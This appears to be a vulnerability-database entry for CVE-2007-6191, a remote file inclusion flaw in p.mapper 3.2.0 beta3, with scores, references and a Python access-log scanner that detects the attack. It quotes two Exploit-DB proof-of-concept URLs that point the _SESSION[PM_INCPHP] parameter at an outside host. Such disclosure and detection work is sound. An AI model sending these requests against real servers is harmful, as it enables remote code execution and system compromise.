CVE-2007-6191
Published: 2007-11-30
Priority: P3 37, medium, 6.8 (CVSS 2.0)
CVSS vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.19% (80.2th percentile)
Multiple PHP remote file inclusion vulnerabilities in Armin Burger p.mapper 3.2.0 beta3 allow remote attackers to execute arbitrary PHP code via a URL in the _SESSION[PM_INCPHP] parameter to (1) incphp/globals.php or (2) plugins/export/mc_table.php. NOTE: it could be argued that this vulnerability is caused by a problem in PHP and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in p.mapper.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pmapper | p.mapper | — | — |
No detection rules found.
Exploit-DB
p.mapper 3.2 beta3 - '/incPHP/globals.php?_SESSION[PM_INCPHP]' Remote File Inclusion
exploitdb·2007-11-27
---
source: https://www.securityfocus.com/bid/26614/info
p.mapper is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect p.mapper 3.2.0 beta3; other versions may also be vulnerable.
http://www.example.com/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=http://www.example2.com
Exploit-DB
p.mapper 3.2 beta3 - '/plugins/export/mc_table.php?_SESSION[PM_INCPHP]' Remote File Inclusion
exploitdb·2007-11-27
---
source: https://www.securityfocus.com/bid/26614/info
p.mapper is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect p.mapper 3.2.0 beta3; other versions may also be vulnerable.
http://www.example.com/pmapper-3.2-beta3/plugins/export/mc_table.php?_SESSION[PM_INCPHP]=http://www.example2.com
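A log check for the two request patterns above, added here as an example and not taken from p.mapper, Exploit-DB or the advisory: it flags access-log lines in which the `_SESSION[PM_INCPHP]` parameter reaches either affected script with a URL-like value, including percent-encoded forms. The log lines, the `classify` and `scan` names and the verdict labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# The two entry points named in the CVE description, compared case-insensitively
# because the entries above write the directory both as incphp/ and incPHP/.
AFFECTED_SUFFIXES = ("/incphp/globals.php", "/plugins/export/mc_table.php")
PARAM = "_session[pm_incphp]"
# A value that names a scheme (http:, ftp:, php:, ...) or is protocol-relative (//host).
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)
# Request line of a Common/Combined Log Format entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return 'rfi-attempt', 'session-param-injection' or None for one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    # parse_qsl percent-decodes, so %5B/%5D-encoded brackets are matched too.
    params = {k.lower(): v for k, v in parse_qsl(target.query, keep_blank_values=True)}
    if PARAM not in params:
        return None
    on_affected_script = target.path.lower().endswith(AFFECTED_SUFFIXES)
    if on_affected_script and REMOTE_VALUE.match(params[PARAM]):
        return "rfi-attempt"
    # Session data lives server-side, so the parameter name alone still
    # merits a lower-severity alert.
    return "session-param-injection"

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    return [(i, v) for i, line in enumerate(lines, 1) if (v := classify(line))]

SAMPLE_LOG = [  # constructed Combined Log Format lines, documentation addresses only
    '192.0.2.10 - - [27/Nov/2007:10:00:01 +0000] "GET /pmapper-3.2-beta3/map.phtml HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Nov/2007:10:02:13 +0000] "GET /pmapper-3.2-beta3/incphp/globals.php'
    '?_SESSION[PM_INCPHP]=http://www.example2.com HTTP/1.1" 200 312',
    '192.0.2.44 - - [27/Nov/2007:10:02:15 +0000] "GET /pmapper-3.2-beta3/plugins/export/mc_table.php'
    '?_SESSION%5BPM_INCPHP%5D=http%3A%2F%2Fwww.example2.com HTTP/1.1" 200 298',
    '192.0.2.51 - - [27/Nov/2007:10:05:40 +0000] "GET /pmapper-3.2-beta3/incPHP/globals.php'
    '?_SESSION[PM_INCPHP]=incphp HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(lineno, verdict)
```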
No writeups or analysis indexed.
http://secunia.com/advisories/27876
http://www.packetstormsecurity.org/0711-exploits/pmapper-rfi.txt
http://www.securityfocus.com/bid/26614
https://exchange.xforce.ibmcloud.com/vulnerabilities/38732